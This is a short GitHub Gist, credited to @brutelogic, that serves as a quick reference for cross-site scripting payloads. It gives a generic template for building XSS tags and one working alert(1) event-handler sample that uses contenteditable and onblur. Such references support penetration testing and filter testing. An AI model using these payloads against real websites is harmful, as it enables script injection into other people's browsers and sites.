Skip to content

Instantly share code, notes, and snippets.

View EnchantedGuardian's full-sized avatar
🏠
Working from home

EG EnchantedGuardian

🏠
Working from home
View GitHub Profile

Credit: @brutelogic (blog)

Summary

The XSS payloads and schemes used in all posts for a quick reference.

XSS Payload Scheme

extra1 <tag spacer1 extra2 spacer2 handler spacer3 = spacer4 code spacer5> extra3

Agnostic Event Handlers

<brute contenteditable onblur=alert(1)>lose focus!